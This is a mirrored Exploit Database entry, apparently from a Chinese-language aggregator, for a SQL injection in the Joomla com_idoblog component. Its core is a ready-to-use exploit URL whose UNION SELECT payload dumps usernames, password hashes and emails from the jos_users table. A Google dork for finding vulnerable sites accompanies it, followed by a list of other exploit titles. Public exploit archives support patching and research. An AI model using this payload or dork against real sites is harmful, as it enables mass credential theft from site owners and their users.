Joomla! Component com_idoblog – SQL Injection

Exploit Database
10 阅读

作者： NOCKAR1111

日期： 2010-12-25
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15827/

# Exploit Title: joomla com_idoblog /SQL injection Vulnerability
# Google Dork: inurl:"com_idoblog"
# Date: 25/12/2010
# Author: NOCKAR1111
# Location:Algeria
# AuthorEmail:nockar1111@hotmail.com
# Language: php
# Tested on: windows xp sp3 en
# http://extensions.joomla.org/extensions/news-production/blog/9218

#Exploit:http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

____________________________________________
Greetz:Lagripe-dz,BrOx-Dz,Mr NoRvI,indoushka
and dz4all members

last Exploits
Joomla! Component com_idoblog – SQL Injection的更多信息

Elite Gaming Ladders 3.0 – SQL Injection：
WebsiteBaker v2.13.3 – Cross-Site Scripting (XSS)：
D-Link DKVM-IP8 – Cross-Site Scripting：
PHP Booking Calendar 10e – ‘page_info_message’ Cross-Site Scripting：
Mantis Bug Tracker 2.24.3 – ‘access’ SQL Injection：
Interspire Email Marketer 6.20 – ‘surveys_submit.php’ Remote Code Execution：
Delta Sql 1.8.2 – Arbitrary File Upload：
Ad Manager Pro 4 – Local File Inclusion：